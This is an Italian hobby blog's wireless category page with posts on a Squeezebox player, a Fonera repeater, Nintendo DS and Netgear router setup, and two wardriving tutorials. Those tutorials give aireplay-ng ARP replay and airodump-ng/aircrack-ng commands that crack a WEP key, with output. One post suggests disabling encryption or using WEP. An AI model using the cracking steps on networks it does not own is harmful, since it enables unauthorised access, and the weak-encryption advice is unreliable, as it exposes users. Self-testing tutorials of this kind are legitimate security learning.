Browsing Category: "Tecnologie senza fili"

Lettore musicale di rete: Squeezebox

Monday, December 7th, 2009 | Tecnologie senza fili, wireless with 5 Comments

sqeezbox-original

Nella ristretta gamma dei lettori musicali di rete, oggi voglio proporvi un gadget veramente innovativo:  Squeezebox è un’apparato Wi-Fi privo di lettore cd, ma in grado di riprodurre ed utilizzare come sorgente musicale un server(PC) oppure servizi web.

CARATTERISTICHE TECNICHE:

Sul mercato esistono ben pochi modelli con le caratteristiche di questo gioiellino, ma vediamole nel dettaglio:

  1. . Amplificatore da 30 watt che garantisce un qualità musicale in ogni angolo della casa.
  2. . Supporta praticamente qualsiasi formato di file musicale, tra cui MP3, FLAC, WMA, WMA Lossless, AAC, Apple Lossless, WAV e AIFF.
  3. . Display con luminosità variabile.
  4. . Supporto crittografia wireless wep-wpa-wpa2.
  5. . Possibilità di estensione delle funzionalità tramite plugin.
  6. . Accesso a musica digitale.
  7. . Presa di rete ethernet.
  8. . Tecomando ad infrarossi.
  9. . Connettività di rete wifi.
  10. . Prezzo limitato, personalmente ho speso 150Euro.

Ora voglio soffermarmi su due o tre punti che ritengo fondamentali, i quali certamente sarebbero stati citati in eventuali FAQ:

1) Come mi posso connettere allo Squeezebox?

retro_squeez

Attraverso la rete wifi,  sia di tipo ‘infrastruttura’ e quindi il collegamento avverrà tramite un access-point oppure ‘ad-hoc’, collegando due pc distinti.

Attraverso la rete ethernet, collegando mediante un cavo di rete lo squeezbox al router.

2) Quali fonti posso utilizzare per ascoltare musica?

– Un qualsiasi pc contenente brani musicali.

– Un lettore mp3.

Mysqueezebox.com, con le applicazioni correlate(creare preventivamente un account).

3) Qualora volessi utilizzare il mio pc come fonte musicale, come devo procedere?

Prima di tutto scarichiamo il programma gratuito Squeezebox Server, una volta installato occorre configurare nella scheda ‘account’ la propria mail e la relativa password, in modo da poter switchare tra lo  squeezebox network e il propio server locale comodamente.

Ora non resta che avviare l’interfaccia web tramite l’indirizzo http://mioip:9000/ ,dove ‘mioip’ sta ad indicare l’ ip con cui si esce su internet, quello lan oppure il propio localhost.

4) Se utilizzassi come sistema operativo una distribuzione basata su linux è comunque installabile Squeezebox Server?

Certamente, con un piccolo accorgimento per le distro debian-based,  vi suggerisco la guida che ho utilizzato io stesso “How to install Squeezebox Server on Ubuntu Karmic“.

Grazie  alle sue ottime caratteristiche, lo Squeezebox si presta veramente alle situazioni più disparate; è finita l’era di cavi e fili ingombranti,  le tecnologie che sfruttano il wifi sono alla portata di tutti e natale è alle porte, cosa aspettate a provarlo?

Share

Wardriving: quando e come generare traffico

Thursday, August 21st, 2008 | Tecnologie senza fili, wireless with 2 Comments

traffico

In una normale sessione di wardriving, può capitare che la raccolta di IV(vettori di inizializzazione) sia estremamente lenta; ne deriva una conseguente perdita di tempo.
In ogni attacco informatico, in questo caso sto simulando un attacco alla mia rete wireless, è di fondamentale importanza semplicizzare e velocizzare ogni operazione.

Come catturare gli IV rapidamente:

Utilizzeremo un tool(compreso in bt3) dal nome aireplay, il quale ci permetterà tramite l’attacco arp request replay, di incrementare i vettori di inizializzazione. Vediamo ora come è strutturata una azione di questo tipo:

Si attende l’invio di un pacchetto ARP, protoccollo che permette di tradurre un indirizzo ip in un mac address, e lo si ritrasmette all’access point. Ogni pacchetto ARP che viene ritrasmesso genera a sua volta un IV, è facile così intuire come in questo modo si incrementi il numero di vettori di inzializzazione, andando essi a sommarsi a quelli raccolti in precedenza(airodump). Questo attacco presuppone la presenza di un client connesso alla rete bersaglio, perciò si può procedere in due modi:

1) Se sono presenti client associati all’ AP, individuare il MAC address di uno di essi, tramite il tool kismet.

2) Se non sono presenti client associati all’AP procedere con autenticazione falsa(Fake authentication).

ARP request replay in sostanza:

Aprire una nuova shell e digitare

[snippet=7960]

Capire i parametri:

“aireplay-ng” –> programma che utilizziamo.

” -3 ” –>  identifica il tipo di attacco, cioè l’arp request replay.

” MAC_AP_BERSAGLIO” –> dovremo sostiuire con l’indirizzo mac della rete sui cui stiamo testando la sicurezza, la rete vittima.

” MAC_CLIENT_ASSOCIATO” –> dovremo sostiuire con il mac della nostra scheda in caso abbiamo effettuato una fake authentication oppure il mac di un client associato in caso l’AP ne abbia.

“eth0” –> la nostra interfaccia di rete.

Note: Questo tutorial è stato presupposto per approfondire una sola sessione di un attacco ad una rete wifi, pertanto per avere un quadro generale consiglio di visitare la ducumentazione ufficiale sul sito di aircrack-ng.
Ringrazio Gnu/linux magazine per lo spunto.

Share

Fonera + freewlan in modalità repeater

Saturday, August 9th, 2008 | Fonera, Tecnologie senza fili, wireless with 21 Comments

fonera with freewlan addons

Benvenuti, innanzitutto devo fare dei ringraziamenti a priori:

dovuti all’aiuto che mi è stato fornito mediante consulti e tutorial vari; vedremo quindi oggi come installare l’addons freewlan sulla fonera e settarla successivamente in modalità repeater. Ci tengo a precisare che articolo che scriverò sarà in base al procedimento effettuato da me, pertanto potrebbero esserci soluzioni alternative per lo stesso scopo.

1) DOWNGRADE FIRMWARE:

Per downgrading intendiamo una pratica volta a tornare ad una vecchia versione di un applicativo. Nel mio caso è stato necessiaro effettuare il downgrade del firmware della fonera in quanto era 0.7.2r3 e l’addons non era installabile; il procedimento che ho effettuato è questo(hack di emanuele).

2) INSTALLAZIONE FREEWLAN ADDONS:

Bene, ora siamo pronti ad installare il nostro addons, alternativo al firmware dd-wrt. Avendo alcuni problemi con la linea internet, preferendo non rischiare, ho optato per questa guida–> installare freewlan addons offline(serve registrazione).

3) CONFIGURAZIONE FONERA IN MODALITÁ REPEATER:

Nel mio caso mi occorreva costruire una sorta di ponte che permettesse, con maggiore efficienza, il collegamento tra un router al secondo piano e un pc dotato di usb wifi; vediamo ora come settare la fonera in modalità repeater:

impostare la modalità WLAN(QRM) tramite il menù a discesa presente nella scheda “avanzate”–> “connessione ad internet”, come possiamo vedere qua:

qrm_mode

[ingrandisci la foto]

Inserire infine l’ssid della rete a cui si vuole connettersi e la cifratura. Ringrazio fonera.tuttoeniente.net per il supporto.

Share

Netgear dg834g e Nintendo DS – colleghiamoli

Wednesday, June 25th, 2008 | ds, router, Tecnologie senza fili, wireless with 5 Comments

netgear and ds wifi collegamento

Benvenuti, propio in questi giorni hanno regalato a mia sorella il Nintendo DS lite, famosa console portatile fabbricata dalla Nintendo Corporation; non resistendo alla tentazione di scoprire le sue funzionalità mi sono subito documentato sulle features proposte da questo gioiellino tascabile; quella che mi ha attirato maggiormente è la presenza della tecnologia wireless.. e qua si apre un mondo di possibilità..^^

Questa breve introduzione è stata fatta per parlarvi stassera del gioco online, mediante questa console, contro giocatori di tutto il mondo e gratuitamente!. Il gioco preso in questione è “Mario_Kart DS”.

Obiettivo: collegare il Nintendo DS al router Netgear dg834g v3

Sul router…

– Rechiamoci nel pannello del Netgear, digitando nel broswer solitamente 192.168.0.1

– Click nel pannello delle “Impostazioni Wireless”.

– Controlliamo che nella categoria “Opzioni di protezione” sia presente il check o su “disabilitato” o su ” WEP”, in quest’ultimo caso dovremmo generare una chiave a X bit. Per salvare il tutto clicchiamo su Applica.

Sul Nintendo DS…

– Dopo aver avuto accesso al gioco Mario_Kart DS rechiamoci in “Nintendo Wi-fi Connection”.

– Ora possiamo procedere in 2 modi: la prima possibilità è configurare manualmente la connessione, in questo caso entriamo nel pannello “Impostazioni Nintendo wi-fi connection” e impostiamo le opzioni in questo modo:

SSID –> Impostiamo lo stesso presente sul router.

Chiave WEP –> la inseriamo in caso l’avessimo impostata sul router, altrimenti lasciamo il pannello vuoto.

Ottieni indirizzo IP automaticamente –> Si.

Ottieni DNS automaticamente –> Si.

Il resto delle opzioni lasciamole di default.

Ora non ci resta che cliccare su “Salva impostazioni”, riaccedere alla configurazione e fare “Prova connessione”. Il dispositivo sarà così collegato e potremo procedere a giocare online gratuitamente.

Come seconda alternativa, dopo essere entrati nel pannello delle impostazioni scegliere “Ricerca Access Point”, verrà fatta una scansione delle reti presenti, quando verrà trovata la vostra dovrete solo clicccare per confermare e i dispositivi saranno rispettivamente collegati.

Share

Impostare wpa su router netgear DG834G

Sunday, March 16th, 2008 | router, sicurezza, Tecnologie senza fili, wireless with 33 Comments

netgear dg834g

Ieri sera ho fatto un pò di prove per poter passare da una cifratura wep ad una wpa; ovviamente i vantaggi sono innegabili in quanto una di tipo wep è facilmente bucabile da estranei(wardriving rulez ^^)
Possiedo un netgear dg834g, ottimo router wi-fi, ho deciso di effettuare ora il cambio in quanto fino ad oggi non ne avevo sentito la necessità, pur conoscendone i pericoli. Partiamo, fate esattamente i passaggi che dico:

– digitiamo nel broswer: 192.168.0.1

– inseriamo pass e user (di default sono–> “admin” & “password”)

– rechiamoci, guardando la colonna di sinistra, in “Impostazioni wireless”

-Scendiamo finchè non noteremo la sezione “Opzioni di protezione”, selezioniamo “wpa-psk”

– Ora dovremmo inserire la chiave, per fare ciò vi consiglio di utilizzare questo generatore wpa ( inserite il n° dei caratteri, consiglio 22, e poi date l’ok, ritroverete l’algoritmo nella casella di testo infondo.)

– Inseriamo la stringa di caratteri che ci è stata restituita a video dal sito nell’ultima casella, dopodichè clicchiamo su “applica” ed il gioco è finito.

L’errore involontario che avevo commesso, in buona fede, era stato di entrare in “impostazione controllo accessi” e selezionare la prima opzione, tale opzione impediva di connettersi per qualsiasi client, effettuando il controllo sul mac address e non sul algoritmo di cifratura.

Share

Wireless hack – testiamo la nostra linea senza fili in soli 5minuti and 10secondi

Friday, March 7th, 2008 | sicurezza, Tecnologie senza fili, wireless with 21 Comments

wireless_hack

Dovete testare la vostra linea wireless ed avete poco tempo? Come tutti ben sappiamo il pericolo è sempre dietro l’angolo e per questo è necessario prevenire, scopriremo oggi come un qualsiasi malintenzionato potrebbe facilmente accedere alla nostra connessione internet, sfruttarla, ed entrare in possesso dei vostri file condivisi; il tutto in 5minuti e 10 secondi.

Componenti utilizzati:

– 1 router wi-fi collegato al fisso

– 1 portatile avente scheda wireless.

Ricordo che in questo procedimento ho cercato di eliminare ogni passaggio superfluo, riducendo i tempi ed ottimizzando l’intera procedura.

1) Inseriamo la distro live di backtrack3 nel laptop e carichiamola.

2) Apro il terminale e digitiamo “iwconfig” –>controllo che non sia associata a niente la scheda, essendo la distro live, come impostazione di default non dovreste modificare niente.

3)da terminale “airodump-ng -c 11 –write dump wlan0 “, dove 11–>è il canale e wlan0 è l’interfaccia.

4) una volta raccolti circa 50000 pacchetti…ci ha messo davvero pochissimo..ho dato da terminale:

aircrack-ng -z -b mac_ap dump-01*.cap

*mac_ap: è ovviamente il mac della scheda “vittima”

* dump-01.cap –> è il nome del file con il quale i pacchetti vengono catturati(ho notato che questo valore è incrementale).

dopo circa dieci secondi la shell mi restituisce:

opening dump-01.cap
attack will be restarted every 5000 captured ivs.
starting PTW attack with 50518ivs.
KEY FOUND! [1*:77:1E:1*:*8]
Decrypted correctly: 100%

Per motivi di privacy ovviamente ho alterato la pass con degli asterischi, fatene buon uso, ricordo che violare reti altrui è illegale e punibile.

Alcune precisazioni:

– la chiave in questione era una wep a 64bit

– il router era un Netgear v3

Share